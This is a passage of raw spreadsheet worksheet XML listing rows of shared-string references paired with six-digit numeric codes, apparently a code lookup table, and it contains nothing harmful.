      <c r="B21618" s="14" t="s">
        <v>17460</v>
      </c>
      <c r="C21618" s="15">
        <v>830580</v>
      </c>
    </row>
    <row r="21619" spans="1:3">
      <c r="A21619" s="28" t="s">
        <v>26966</v>
      </c>
      <c r="B21619" s="14" t="s">
        <v>17460</v>
      </c>
      <c r="C21619" s="15">
        <v>830590</v>
      </c>
    </row>
    <row r="21620" spans="1:3">
      <c r="A21620" s="28" t="s">
        <v>26966</v>
      </c>
      <c r="B21620" s="14" t="s">
        <v>17460</v>
      </c>
      <c r="C21620" s="15">
        <v>830626</v>
      </c>
    </row>
    <row r="21621" spans="1:3">
      <c r="A21621" s="28" t="s">
        <v>26966</v>
      </c>
      <c r="B21621" s="14" t="s">
        <v>17460</v>
      </c>
      <c r="C21621" s="15">
        <v>830645</v>
      </c>
    </row>
    <row r="21622" spans="1:3">
      <c r="A21622" s="28" t="s">
        <v>26966</v>
      </c>
      <c r="B21622" s="14" t="s">
        <v>17460</v>
      </c>
      <c r="C21622" s="15">
        <v>830660</v>
      </c>
    </row>
    <row r="21623" spans="1:3">
      <c r="A21623" s="28" t="s">
        <v>26966</v>
      </c>
      <c r="B21623" s="14" t="s">
        <v>17460</v>
      </c>
      <c r="C21623" s="15">
        <v>830667</v>
      </c>
    </row>
    <row r="21624" spans="1:3">
      <c r="A21624" s="28" t="s">
        <v>26966</v>
      </c>
      <c r="B21624" s="14" t="s">
        <v>17460</v>
      </c>
      <c r="C21624" s="15">
        <v>830670</v>
      </c>
    </row>
    <row r="21625" spans="1:3">
      <c r="A21625" s="28" t="s">
        <v>26966</v>
      </c>
      <c r="B21625" s="14" t="s">
        <v>17460</v>
      </c>
      <c r="C21625" s="15">
        <v>830674</v>
      </c>
    </row>
    <row r="21626" spans="1:3">
      <c r="A21626" s="28" t="s">
        <v>26966</v>
      </c>
      <c r="B21626" s="14" t="s">
        <v>17460</v>
      </c>
      <c r="C21626" s="15">
        <v>830755</v>
      </c>
    </row>
    <row r="21627" spans="1:3">
      <c r="A21627" s="28" t="s">
        <v>26966</v>
      </c>
      <c r="B21627" s="14" t="s">
        <v>17460</v>
      </c>
      <c r="C21627" s="15">
        <v>830767</v>
      </c>
    </row>
    <row r="21628" spans="1:3">
      <c r="A21628" s="28" t="s">
        <v>26966</v>
      </c>
      <c r="B21628" s="14" t="s">
        <v>17460</v>
      </c>
      <c r="C21628" s="15">
        <v>830845</v>
      </c>
    </row>
    <row r="21629" spans="1:3">
      <c r="A21629" s="28" t="s">
        <v>26966</v>
      </c>
      <c r="B21629" s="14" t="s">
        <v>17460</v>
      </c>
      <c r="C21629" s="15">
        <v>830855</v>
      </c>
    </row>
    <row r="21630" spans="1:3">
      <c r="A21630" s="28" t="s">
        <v>26966</v>
      </c>
      <c r="B21630" s="14" t="s">
        <v>17460</v>
      </c>
      <c r="C21630" s="15">
        <v>830867</v>
      </c>
    </row>
    <row r="21631" spans="1:3">
      <c r="A21631" s="28" t="s">
        <v>26967</v>
      </c>
      <c r="B21631" s="14" t="s">
        <v>17461</v>
      </c>
      <c r="C21631" s="15">
        <v>831000</v>
      </c>
    </row>
    <row r="21632" spans="1:3">
      <c r="A21632" s="28" t="s">
        <v>26967</v>
      </c>
      <c r="B21632" s="14" t="s">
        <v>17461</v>
      </c>
      <c r="C21632" s="15">
        <v>831290</v>
      </c>
    </row>
    <row r="21633" spans="1:3">
      <c r="A21633" s="28" t="s">
        <v>26967</v>
      </c>
      <c r="B21633" s="14" t="s">
        <v>17461</v>
      </c>
      <c r="C21633" s="15">
        <v>831460</v>
      </c>
    </row>
    <row r="21634" spans="1:3">
      <c r="A21634" s="28" t="s">
        <v>26967</v>
      </c>
      <c r="B21634" s="14" t="s">
        <v>17461</v>
      </c>
      <c r="C21634" s="15">
        <v>831480</v>
      </c>
    </row>
    <row r="21635" spans="1:3">
      <c r="A21635" s="28" t="s">
        <v>26967</v>
      </c>
      <c r="B21635" s="14" t="s">
        <v>17461</v>
      </c>
      <c r="C21635" s="15">
        <v>831490</v>
      </c>
    </row>
    <row r="21636" spans="1:3">
      <c r="A21636" s="28" t="s">
        <v>26967</v>
      </c>
      <c r="B21636" s="14" t="s">
        <v>17461</v>
      </c>
      <c r="C21636" s="15">
        <v>831545</v>
      </c>
    </row>
    <row r="21637" spans="1:3">
      <c r="A21637" s="28" t="s">
        <v>26967</v>
      </c>
      <c r="B21637" s="14" t="s">
        <v>17461</v>
      </c>
      <c r="C21637" s="15">
        <v>831550</v>
      </c>
    </row>
    <row r="21638" spans="1:3">
      <c r="A21638" s="28" t="s">
        <v>26967</v>
      </c>
      <c r="B21638" s="14" t="s">
        <v>17461</v>
      </c>
      <c r="C21638" s="15">
        <v>831560</v>
      </c>
    </row>
    <row r="21639" spans="1:3">
      <c r="A21639" s="28" t="s">
        <v>26967</v>
      </c>
      <c r="B21639" s="14" t="s">
        <v>17461</v>
      </c>
      <c r="C21639" s="15">
        <v>831570</v>
      </c>
    </row>
    <row r="21640" spans="1:3">
      <c r="A21640" s="28" t="s">
        <v>26967</v>
      </c>
      <c r="B21640" s="14" t="s">
        <v>17461</v>
      </c>
      <c r="C21640" s="15">
        <v>831580</v>
      </c>
    </row>
    <row r="21641" spans="1:3">
      <c r="A21641" s="28" t="s">
        <v>26967</v>
      </c>
      <c r="B21641" s="14" t="s">
        <v>17461</v>
      </c>
      <c r="C21641" s="15">
        <v>831590</v>
      </c>
    </row>
    <row r="21642" spans="1:3">
      <c r="A21642" s="28" t="s">
        <v>26967</v>
      </c>
      <c r="B21642" s="14" t="s">
        <v>17461</v>
      </c>
      <c r="C21642" s="15">
        <v>831626</v>
      </c>
    </row>
    <row r="21643" spans="1:3">
      <c r="A21643" s="28" t="s">
        <v>26967</v>
      </c>
      <c r="B21643" s="14" t="s">
        <v>17461</v>
      </c>
      <c r="C21643" s="15">
        <v>831645</v>
      </c>
    </row>
    <row r="21644" spans="1:3">
      <c r="A21644" s="28" t="s">
        <v>26967</v>
      </c>
      <c r="B21644" s="14" t="s">
        <v>17461</v>
      </c>
      <c r="C21644" s="15">
        <v>831660</v>
      </c>
    </row>
    <row r="21645" spans="1:3">
      <c r="A21645" s="28" t="s">
        <v>26967</v>
      </c>
      <c r="B21645" s="14" t="s">
        <v>17461</v>
      </c>
      <c r="C21645" s="15">
        <v>831667</v>
      </c>
    </row>
    <row r="21646" spans="1:3">
      <c r="A21646" s="28" t="s">
        <v>26967</v>
      </c>
      <c r="B21646" s="14" t="s">
        <v>17461</v>
      </c>
      <c r="C21646" s="15">
        <v>831670</v>
      </c>
    </row>
    <row r="21647" spans="1:3">
      <c r="A21647" s="28" t="s">
        <v>26967</v>
      </c>
      <c r="B21647" s="14" t="s">
        <v>17461</v>
      </c>
      <c r="C21647" s="15">
        <v>831674</v>
      </c>
    </row>
    <row r="21648" spans="1:3">
      <c r="A21648" s="28" t="s">
        <v>26967</v>
      </c>
      <c r="B21648" s="14" t="s">
        <v>17461</v>
      </c>
      <c r="C21648" s="15">
        <v>831755</v>
      </c>
    </row>
    <row r="21649" spans="1:3">
      <c r="A21649" s="28" t="s">
        <v>26967</v>
      </c>
      <c r="B21649" s="14" t="s">
        <v>17461</v>
      </c>
      <c r="C21649" s="15">
        <v>831845</v>
      </c>
    </row>
    <row r="21650" spans="1:3">
      <c r="A21650" s="28" t="s">
        <v>26967</v>
      </c>
      <c r="B21650" s="14" t="s">
        <v>17461</v>
      </c>
      <c r="C21650" s="15">
        <v>831867</v>
      </c>
    </row>
    <row r="21651" spans="1:3">
      <c r="A21651" s="28" t="s">
        <v>26968</v>
      </c>
      <c r="B21651" s="14" t="s">
        <v>17462</v>
      </c>
      <c r="C21651" s="15">
        <v>832000</v>
      </c>
    </row>
    <row r="21652" spans="1:3">
      <c r="A21652" s="28" t="s">
        <v>26968</v>
      </c>
      <c r="B21652" s="14" t="s">
        <v>17462</v>
      </c>
      <c r="C21652" s="15">
        <v>832290</v>
      </c>
    </row>
    <row r="21653" spans="1:3">
      <c r="A21653" s="28" t="s">
        <v>26969</v>
      </c>
      <c r="B21653" s="14" t="s">
        <v>17462</v>
      </c>
      <c r="C21653" s="15">
        <v>832460</v>
      </c>
    </row>
    <row r="21654" spans="1:3">
      <c r="A21654" s="28" t="s">
        <v>26968</v>
      </c>
      <c r="B21654" s="14" t="s">
        <v>17462</v>
      </c>
      <c r="C21654" s="15">
        <v>832480</v>
      </c>
    </row>
    <row r="21655" spans="1:3">
      <c r="A21655" s="28" t="s">
        <v>26968</v>
      </c>
      <c r="B21655" s="14" t="s">
        <v>17462</v>
      </c>
      <c r="C21655" s="15">
        <v>832490</v>
      </c>
    </row>
    <row r="21656" spans="1:3">
      <c r="A21656" s="28" t="s">
        <v>26968</v>
      </c>
      <c r="B21656" s="14" t="s">
        <v>17462</v>
      </c>
      <c r="C21656" s="15">
        <v>832550</v>
      </c>
    </row>
    <row r="21657" spans="1:3">
      <c r="A21657" s="28" t="s">
        <v>26968</v>
      </c>
      <c r="B21657" s="14" t="s">
        <v>17462</v>
      </c>
      <c r="C21657" s="15">
        <v>832560</v>
      </c>
    </row>
    <row r="21658" spans="1:3">
      <c r="A21658" s="28" t="s">
        <v>26968</v>
      </c>
      <c r="B21658" s="14" t="s">
        <v>17462</v>
      </c>
      <c r="C21658" s="15">
        <v>832570</v>
      </c>
    </row>
    <row r="21659" spans="1:3">
      <c r="A21659" s="28" t="s">
        <v>26968</v>
      </c>
      <c r="B21659" s="14" t="s">
        <v>17462</v>
      </c>
      <c r="C21659" s="15">
        <v>832580</v>
      </c>
    </row>
    <row r="21660" spans="1:3">
      <c r="A21660" s="28" t="s">
        <v>26968</v>
      </c>
      <c r="B21660" s="14" t="s">
        <v>17462</v>
      </c>
      <c r="C21660" s="15">
        <v>832590</v>
      </c>
    </row>
    <row r="21661" spans="1:3">
      <c r="A21661" s="28" t="s">
        <v>26968</v>
      </c>
      <c r="B21661" s="14" t="s">
        <v>17462</v>
      </c>
      <c r="C21661" s="15">
        <v>832645</v>
      </c>
    </row>
    <row r="21662" spans="1:3">
      <c r="A21662" s="28" t="s">
        <v>26969</v>
      </c>
      <c r="B21662" s="14" t="s">
        <v>17462</v>
      </c>
      <c r="C21662" s="15">
        <v>832660</v>
      </c>
    </row>
    <row r="21663" spans="1:3">
      <c r="A21663" s="28" t="s">
        <v>26968</v>
      </c>
      <c r="B21663" s="14" t="s">
        <v>17462</v>
      </c>
      <c r="C21663" s="15">
        <v>832667</v>
      </c>
    </row>
    <row r="21664" spans="1:3">
      <c r="A21664" s="28" t="s">
        <v>26969</v>
      </c>
      <c r="B21664" s="14" t="s">
        <v>17462</v>
      </c>
      <c r="C21664" s="15">
        <v>832670</v>
      </c>
    </row>
    <row r="21665" spans="1:3">
      <c r="A21665" s="28" t="s">
        <v>26968</v>
      </c>
      <c r="B21665" s="14" t="s">
        <v>17462</v>
      </c>
      <c r="C21665" s="15">
        <v>832674</v>
      </c>
    </row>
    <row r="21666" spans="1:3">
      <c r="A21666" s="28" t="s">
        <v>26970</v>
      </c>
      <c r="B21666" s="14" t="s">
        <v>17463</v>
      </c>
      <c r="C21666" s="15">
        <v>833000</v>
      </c>
    </row>
    <row r="21667" spans="1:3">
      <c r="A21667" s="28" t="s">
        <v>26970</v>
      </c>
      <c r="B21667" s="14" t="s">
        <v>17463</v>
      </c>
      <c r="C21667" s="15">
        <v>833290</v>
      </c>
    </row>
    <row r="21668" spans="1:3">
      <c r="A21668" s="28" t="s">
        <v>26970</v>
      </c>
      <c r="B21668" s="14" t="s">
        <v>17463</v>
      </c>
      <c r="C21668" s="15">
        <v>833460</v>
      </c>
    </row>
    <row r="21669" spans="1:3">
      <c r="A21669" s="28" t="s">
        <v>26970</v>
      </c>
      <c r="B21669" s="14" t="s">
        <v>17463</v>
      </c>
      <c r="C21669" s="15">
        <v>833480</v>
      </c>
    </row>
    <row r="21670" spans="1:3">
      <c r="A21670" s="28" t="s">
        <v>26970</v>
      </c>
      <c r="B21670" s="14" t="s">
        <v>17463</v>
      </c>
      <c r="C21670" s="15">
        <v>833490</v>
      </c>
    </row>
    <row r="21671" spans="1:3">
      <c r="A21671" s="28" t="s">
        <v>26970</v>
      </c>
      <c r="B21671" s="14" t="s">
        <v>17463</v>
      </c>
      <c r="C21671" s="15">
        <v>833545</v>
      </c>
    </row>
    <row r="21672" spans="1:3">
      <c r="A21672" s="28" t="s">
        <v>26970</v>
      </c>
      <c r="B21672" s="14" t="s">
        <v>17463</v>
      </c>
      <c r="C21672" s="15">
        <v>833550</v>
      </c>
    </row>
    <row r="21673" spans="1:3">
      <c r="A21673" s="28" t="s">
        <v>26970</v>
      </c>
      <c r="B21673" s="14" t="s">
        <v>17463</v>
      </c>
      <c r="C21673" s="15">
        <v>833560</v>
      </c>
    </row>
    <row r="21674" spans="1:3">
      <c r="A21674" s="28" t="s">
        <v>26970</v>
      </c>
      <c r="B21674" s="14" t="s">
        <v>17463</v>
      </c>
      <c r="C21674" s="15">
        <v>833570</v>
      </c>
    </row>
    <row r="21675" spans="1:3">
      <c r="A21675" s="28" t="s">
        <v>26970</v>
      </c>
      <c r="B21675" s="14" t="s">
        <v>17463</v>
      </c>
      <c r="C21675" s="15">
        <v>833580</v>
      </c>
    </row>
    <row r="21676" spans="1:3">
      <c r="A21676" s="28" t="s">
        <v>26970</v>
      </c>
      <c r="B21676" s="14" t="s">
        <v>17463</v>
      </c>
      <c r="C21676" s="15">
        <v>833590</v>
      </c>
    </row>
    <row r="21677" spans="1:3">
      <c r="A21677" s="28" t="s">
        <v>26970</v>
      </c>
      <c r="B21677" s="14" t="s">
        <v>17463</v>
      </c>
      <c r="C21677" s="15">
        <v>833626</v>
      </c>
    </row>
    <row r="21678" spans="1:3">
      <c r="A21678" s="28" t="s">
        <v>26970</v>
      </c>
      <c r="B21678" s="14" t="s">
        <v>17463</v>
      </c>
      <c r="C21678" s="15">
        <v>833645</v>
      </c>
    </row>
    <row r="21679" spans="1:3">
      <c r="A21679" s="28" t="s">
        <v>26970</v>
      </c>
      <c r="B21679" s="14" t="s">
        <v>17463</v>
      </c>
      <c r="C21679" s="15">
        <v>833660</v>
      </c>
    </row>
    <row r="21680" spans="1:3">
      <c r="A21680" s="28" t="s">
        <v>26970</v>
      </c>
      <c r="B21680" s="14" t="s">
        <v>17463</v>
      </c>
      <c r="C21680" s="15">
        <v>833667</v>
      </c>
    </row>
    <row r="21681" spans="1:3">
      <c r="A21681" s="28" t="s">
        <v>26970</v>
      </c>
      <c r="B21681" s="14" t="s">
        <v>17463</v>
      </c>
      <c r="C21681" s="15">
        <v>833670</v>
      </c>
    </row>
    <row r="21682" spans="1:3">
      <c r="A21682" s="28" t="s">
        <v>26970</v>
      </c>
      <c r="B21682" s="14" t="s">
        <v>17463</v>
      </c>
      <c r="C21682" s="15">
        <v>833674</v>
      </c>
    </row>
    <row r="21683" spans="1:3">
      <c r="A21683" s="28" t="s">
        <v>26970</v>
      </c>
      <c r="B21683" s="14" t="s">
        <v>17463</v>
      </c>
      <c r="C21683" s="15">
        <v>833755</v>
      </c>
    </row>
    <row r="21684" spans="1:3">
      <c r="A21684" s="28" t="s">
        <v>26970</v>
      </c>
      <c r="B21684" s="14" t="s">
        <v>17463</v>
      </c>
      <c r="C21684" s="15">
        <v>833767</v>
      </c>
    </row>
    <row r="21685" spans="1:3">
      <c r="A21685" s="28" t="s">
        <v>26970</v>
      </c>
      <c r="B21685" s="14" t="s">
        <v>17463</v>
      </c>
      <c r="C21685" s="15">
        <v>833845</v>
      </c>
    </row>
    <row r="21686" spans="1:3">
      <c r="A21686" s="28" t="s">
        <v>26970</v>
      </c>
      <c r="B21686" s="14" t="s">
        <v>17463</v>
      </c>
      <c r="C21686" s="15">
        <v>833855</v>
      </c>
    </row>
    <row r="21687" spans="1:3">
      <c r="A21687" s="28" t="s">
        <v>26970</v>
      </c>
      <c r="B21687" s="14" t="s">
        <v>17463</v>
      </c>
      <c r="C21687" s="15">
        <v>833867</v>
      </c>
    </row>
    <row r="21688" spans="1:3">
      <c r="A21688" s="28" t="s">
        <v>26971</v>
      </c>
      <c r="B21688" s="14" t="s">
        <v>17464</v>
      </c>
      <c r="C21688" s="15">
        <v>834290</v>
      </c>
    </row>
    <row r="21689" spans="1:3">
      <c r="A21689" s="28" t="s">
        <v>26971</v>
      </c>
      <c r="B21689" s="14" t="s">
        <v>17464</v>
      </c>
      <c r="C21689" s="15">
        <v>834460</v>
      </c>
    </row>
    <row r="21690" spans="1:3">
      <c r="A21690" s="28" t="s">
        <v>26971</v>
      </c>
      <c r="B21690" s="14" t="s">
        <v>17464</v>
      </c>
      <c r="C21690" s="15">
        <v>834480</v>
      </c>
    </row>
    <row r="21691" spans="1:3">
      <c r="A21691" s="28" t="s">
        <v>26971</v>
      </c>
      <c r="B21691" s="14" t="s">
        <v>17464</v>
      </c>
      <c r="C21691" s="15">
        <v>834490</v>
      </c>
    </row>
    <row r="21692" spans="1:3">
      <c r="A21692" s="28" t="s">
        <v>26971</v>
      </c>
      <c r="B21692" s="14" t="s">
        <v>17464</v>
      </c>
      <c r="C21692" s="15">
        <v>834545</v>
      </c>
    </row>
    <row r="21693" spans="1:3">
      <c r="A21693" s="28" t="s">
        <v>26971</v>
      </c>
      <c r="B21693" s="14" t="s">
        <v>17464</v>
      </c>
      <c r="C21693" s="15">
        <v>834560</v>
      </c>
    </row>
    <row r="21694" spans="1:3">
      <c r="A21694" s="28" t="s">
        <v>26971</v>
      </c>
      <c r="B21694" s="14" t="s">
        <v>17464</v>
      </c>
      <c r="C21694" s="15">
        <v>834570</v>
      </c>
    </row>
    <row r="21695" spans="1:3">
      <c r="A21695" s="28" t="s">
        <v>26971</v>
      </c>
      <c r="B21695" s="14" t="s">
        <v>17464</v>
      </c>
      <c r="C21695" s="15">
        <v>834580</v>
      </c>
    </row>
    <row r="21696" spans="1:3">
      <c r="A21696" s="28" t="s">
        <v>26971</v>
      </c>
      <c r="B21696" s="14" t="s">
        <v>17464</v>
      </c>
      <c r="C21696" s="15">
        <v>834590</v>
      </c>
    </row>
    <row r="21697" spans="1:3">
      <c r="A21697" s="28" t="s">
        <v>26971</v>
      </c>
      <c r="B21697" s="14" t="s">
        <v>17464</v>
      </c>
      <c r="C21697" s="15">
        <v>834626</v>
      </c>
    </row>
    <row r="21698" spans="1:3">
      <c r="A21698" s="28" t="s">
        <v>26971</v>
      </c>
      <c r="B21698" s="14" t="s">
        <v>17464</v>
      </c>
      <c r="C21698" s="15">
        <v>834645</v>
      </c>
    </row>
    <row r="21699" spans="1:3">
      <c r="A21699" s="28" t="s">
        <v>26971</v>
      </c>
      <c r="B21699" s="14" t="s">
        <v>17464</v>
      </c>
      <c r="C21699" s="15">
        <v>834660</v>
      </c>
    </row>
    <row r="21700" spans="1:3">
      <c r="A21700" s="28" t="s">
        <v>26971</v>
      </c>
      <c r="B21700" s="14" t="s">
        <v>17464</v>
      </c>
      <c r="C21700" s="15">
        <v>834667</v>
      </c>
    </row>
    <row r="21701" spans="1:3">
      <c r="A21701" s="28" t="s">
        <v>26971</v>
      </c>
      <c r="B21701" s="14" t="s">
        <v>17464</v>
      </c>
      <c r="C21701" s="15">
        <v>834670</v>
      </c>
    </row>
    <row r="21702" spans="1:3">
      <c r="A21702" s="28" t="s">
        <v>26971</v>
      </c>
      <c r="B21702" s="14" t="s">
        <v>17464</v>
      </c>
      <c r="C21702" s="15">
        <v>834674</v>
      </c>
    </row>
    <row r="21703" spans="1:3">
      <c r="A21703" s="28" t="s">
        <v>26971</v>
      </c>
      <c r="B21703" s="14" t="s">
        <v>17464</v>
      </c>
      <c r="C21703" s="15">
        <v>834755</v>
      </c>
    </row>
    <row r="21704" spans="1:3">
      <c r="A21704" s="28" t="s">
        <v>26971</v>
      </c>
      <c r="B21704" s="14" t="s">
        <v>17464</v>
      </c>
      <c r="C21704" s="15">
        <v>834767</v>
      </c>
    </row>
    <row r="21705" spans="1:3">
      <c r="A21705" s="28" t="s">
        <v>26971</v>
      </c>
      <c r="B21705" s="14" t="s">
        <v>17464</v>
      </c>
      <c r="C21705" s="15">
        <v>834845</v>
      </c>
    </row>
    <row r="21706" spans="1:3">
      <c r="A21706" s="28" t="s">
        <v>26971</v>
      </c>
      <c r="B21706" s="14" t="s">
        <v>17464</v>
      </c>
      <c r="C21706" s="15">
        <v>834867</v>
      </c>
    </row>
    <row r="21707" spans="1:3">
      <c r="A21707" s="28" t="s">
        <v>26972</v>
      </c>
      <c r="B21707" s="14" t="s">
        <v>8795</v>
      </c>
      <c r="C21707" s="15">
        <v>835000</v>
      </c>
    </row>
    <row r="21708" spans="1:3">
      <c r="A21708" s="28" t="s">
        <v>26972</v>
      </c>
      <c r="B21708" s="14" t="s">
        <v>8795</v>
      </c>
      <c r="C21708" s="15">
        <v>835290</v>
      </c>
    </row>
    <row r="21709" spans="1:3">
      <c r="A21709" s="28" t="s">
        <v>26972</v>
      </c>
      <c r="B21709" s="14" t="s">
        <v>8795</v>
      </c>
      <c r="C21709" s="15">
        <v>835460</v>
      </c>
    </row>
    <row r="21710" spans="1:3">
      <c r="A21710" s="28" t="s">
        <v>26972</v>
      </c>
      <c r="B21710" s="14" t="s">
        <v>8795</v>
      </c>
      <c r="C21710" s="15">
        <v>835480</v>
      </c>
    </row>
    <row r="21711" spans="1:3">
      <c r="A21711" s="28" t="s">
        <v>26972</v>
      </c>
      <c r="B21711" s="14" t="s">
        <v>8795</v>
      </c>
      <c r="C21711" s="15">
        <v>835490</v>
      </c>
    </row>
    <row r="21712" spans="1:3">
      <c r="A21712" s="28" t="s">
        <v>26972</v>
      </c>
      <c r="B21712" s="14" t="s">
        <v>8795</v>
      </c>
      <c r="C21712" s="15">
        <v>835550</v>
      </c>
    </row>
    <row r="21713" spans="1:3">
      <c r="A21713" s="28" t="s">
        <v>26972</v>
      </c>
      <c r="B21713" s="14" t="s">
        <v>8795</v>
      </c>
      <c r="C21713" s="15">
        <v>835560</v>
      </c>
    </row>
    <row r="21714" spans="1:3">
      <c r="A21714" s="28" t="s">
        <v>26972</v>
      </c>
      <c r="B21714" s="14" t="s">
        <v>8795</v>
      </c>
      <c r="C21714" s="15">
        <v>835570</v>
      </c>
    </row>
    <row r="21715" spans="1:3">
      <c r="A21715" s="28" t="s">
        <v>26972</v>
      </c>
      <c r="B21715" s="14" t="s">
        <v>8795</v>
      </c>
      <c r="C21715" s="15">
        <v>835580</v>
      </c>
    </row>
    <row r="21716" spans="1:3">
      <c r="A21716" s="28" t="s">
        <v>26972</v>
      </c>
      <c r="B21716" s="14" t="s">
        <v>8795</v>
      </c>
      <c r="C21716" s="15">
        <v>835590</v>
      </c>
    </row>
    <row r="21717" spans="1:3">
      <c r="A21717" s="28" t="s">
        <v>26972</v>
      </c>
      <c r="B21717" s="14" t="s">
        <v>8795</v>
      </c>
      <c r="C21717" s="15">
        <v>835626</v>
      </c>
    </row>
    <row r="21718" spans="1:3">
      <c r="A21718" s="28" t="s">
        <v>26972</v>
      </c>
      <c r="B21718" s="14" t="s">
        <v>8795</v>
      </c>
      <c r="C21718" s="15">
        <v>835645</v>
      </c>
    </row>
    <row r="21719" spans="1:3">
      <c r="A21719" s="28" t="s">
        <v>26972</v>
      </c>
      <c r="B21719" s="14" t="s">
        <v>8795</v>
      </c>
      <c r="C21719" s="15">
        <v>835660</v>
      </c>
    </row>
    <row r="21720" spans="1:3">
      <c r="A21720" s="28" t="s">
        <v>26972</v>
      </c>
      <c r="B21720" s="14" t="s">
        <v>8795</v>
      </c>
      <c r="C21720" s="15">
        <v>835667</v>
      </c>
    </row>
    <row r="21721" spans="1:3">
      <c r="A21721" s="28" t="s">
        <v>26972</v>
      </c>
      <c r="B21721" s="14" t="s">
        <v>8795</v>
      </c>
      <c r="C21721" s="15">
        <v>835670</v>
      </c>
    </row>
    <row r="21722" spans="1:3">
      <c r="A21722" s="28" t="s">
        <v>26972</v>
      </c>
      <c r="B21722" s="14" t="s">
        <v>8795</v>
      </c>
      <c r="C21722" s="15">
        <v>835674</v>
      </c>
    </row>
    <row r="21723" spans="1:3">
      <c r="A21723" s="28" t="s">
        <v>26972</v>
      </c>
      <c r="B21723" s="14" t="s">
        <v>8795</v>
      </c>
      <c r="C21723" s="15">
        <v>835845</v>
      </c>
    </row>
    <row r="21724" spans="1:3">
      <c r="A21724" s="28" t="s">
        <v>26973</v>
      </c>
      <c r="B21724" s="14" t="s">
        <v>8795</v>
      </c>
      <c r="C21724" s="15">
        <v>836000</v>
      </c>
    </row>
    <row r="21725" spans="1:3">
      <c r="A21725" s="28" t="s">
        <v>26973</v>
      </c>
      <c r="B21725" s="14" t="s">
        <v>8795</v>
      </c>
      <c r="C21725" s="15">
        <v>836290</v>
      </c>
    </row>
    <row r="21726" spans="1:3">
      <c r="A21726" s="28" t="s">
        <v>26973</v>
      </c>
      <c r="B21726" s="14" t="s">
        <v>8795</v>
      </c>
      <c r="C21726" s="15">
        <v>836460</v>
      </c>
    </row>
    <row r="21727" spans="1:3">
      <c r="A21727" s="28" t="s">
        <v>26973</v>
      </c>
      <c r="B21727" s="14" t="s">
        <v>8795</v>
      </c>
      <c r="C21727" s="15">
        <v>836480</v>
      </c>
    </row>
    <row r="21728" spans="1:3">
      <c r="A21728" s="28" t="s">
        <v>26973</v>
      </c>
      <c r="B21728" s="14" t="s">
        <v>8795</v>
      </c>
      <c r="C21728" s="15">
        <v>836490</v>
      </c>
    </row>
    <row r="21729" spans="1:3">
      <c r="A21729" s="28" t="s">
        <v>26973</v>
      </c>
      <c r="B21729" s="14" t="s">
        <v>8795</v>
      </c>
      <c r="C21729" s="15">
        <v>836550</v>
      </c>
    </row>
    <row r="21730" spans="1:3">
      <c r="A21730" s="28" t="s">
        <v>26973</v>
      </c>
      <c r="B21730" s="14" t="s">
        <v>8795</v>
      </c>
      <c r="C21730" s="15">
        <v>836560</v>
      </c>
    </row>
    <row r="21731" spans="1:3">
      <c r="A21731" s="28" t="s">
        <v>26973</v>
      </c>
      <c r="B21731" s="14" t="s">
        <v>8795</v>
      </c>
      <c r="C21731" s="15">
        <v>836570</v>
      </c>
    </row>
    <row r="21732" spans="1:3">
      <c r="A21732" s="28" t="s">
        <v>26973</v>
      </c>
      <c r="B21732" s="14" t="s">
        <v>8795</v>
      </c>
      <c r="C21732" s="15">
        <v>836580</v>
      </c>
    </row>
    <row r="21733" spans="1:3">
      <c r="A21733" s="28" t="s">
        <v>26973</v>
      </c>
      <c r="B21733" s="14" t="s">
        <v>8795</v>
      </c>
      <c r="C21733" s="15">
        <v>836590</v>
      </c>
    </row>
    <row r="21734" spans="1:3">
      <c r="A21734" s="28" t="s">
        <v>26973</v>
      </c>
      <c r="B21734" s="14" t="s">
        <v>8795</v>
      </c>
      <c r="C21734" s="15">
        <v>836626</v>
      </c>
    </row>
    <row r="21735" spans="1:3">
      <c r="A21735" s="28" t="s">
        <v>26973</v>
      </c>
      <c r="B21735" s="14" t="s">
        <v>8795</v>
      </c>
      <c r="C21735" s="15">
        <v>836645</v>
      </c>
    </row>
    <row r="21736" spans="1:3">
      <c r="A21736" s="28" t="s">
        <v>26973</v>
      </c>
      <c r="B21736" s="14" t="s">
        <v>8795</v>
      </c>
      <c r="C21736" s="15">
        <v>836660</v>
      </c>
    </row>
    <row r="21737" spans="1:3">
      <c r="A21737" s="28" t="s">
        <v>26973</v>
      </c>
      <c r="B21737" s="14" t="s">
        <v>8795</v>
      </c>
      <c r="C21737" s="15">
        <v>836667</v>
      </c>
    </row>
    <row r="21738" spans="1:3">
      <c r="A21738" s="28" t="s">
        <v>26973</v>
      </c>
      <c r="B21738" s="14" t="s">
        <v>8795</v>
      </c>
      <c r="C21738" s="15">
        <v>836670</v>
      </c>
    </row>
    <row r="21739" spans="1:3">
      <c r="A21739" s="28" t="s">
        <v>26973</v>
      </c>
      <c r="B21739" s="14" t="s">
        <v>8795</v>
      </c>
      <c r="C21739" s="15">
        <v>836674</v>
      </c>
    </row>
    <row r="21740" spans="1:3">
      <c r="A21740" s="28" t="s">
        <v>26973</v>
      </c>
      <c r="B21740" s="14" t="s">
        <v>8795</v>
      </c>
      <c r="C21740" s="15">
        <v>836845</v>
      </c>
    </row>
    <row r="21741" spans="1:3">
      <c r="A21741" s="28" t="s">
        <v>26974</v>
      </c>
      <c r="B21741" s="14" t="s">
        <v>8795</v>
      </c>
      <c r="C21741" s="15">
        <v>837290</v>
      </c>
    </row>
    <row r="21742" spans="1:3">
      <c r="A21742" s="28" t="s">
        <v>26974</v>
      </c>
      <c r="B21742" s="14" t="s">
        <v>8795</v>
      </c>
      <c r="C21742" s="15">
        <v>837460</v>
      </c>
    </row>
    <row r="21743" spans="1:3">
      <c r="A21743" s="28" t="s">
        <v>26974</v>
      </c>
      <c r="B21743" s="14" t="s">
        <v>8795</v>
      </c>
      <c r="C21743" s="15">
        <v>837480</v>
      </c>
    </row>
    <row r="21744" spans="1:3">
      <c r="A21744" s="28" t="s">
        <v>26974</v>
      </c>
      <c r="B21744" s="14" t="s">
        <v>8795</v>
      </c>
      <c r="C21744" s="15">
        <v>837490</v>
      </c>
    </row>
    <row r="21745" spans="1:3">
      <c r="A21745" s="28" t="s">
        <v>26974</v>
      </c>
      <c r="B21745" s="14" t="s">
        <v>8795</v>
      </c>
      <c r="C21745" s="15">
        <v>837550</v>
      </c>
    </row>
    <row r="21746" spans="1:3">
      <c r="A21746" s="28" t="s">
        <v>26974</v>
      </c>
      <c r="B21746" s="14" t="s">
        <v>8795</v>
      </c>
      <c r="C21746" s="15">
        <v>837560</v>
      </c>
    </row>
    <row r="21747" spans="1:3">
      <c r="A21747" s="28" t="s">
        <v>26974</v>
      </c>
      <c r="B21747" s="14" t="s">
        <v>8795</v>
      </c>
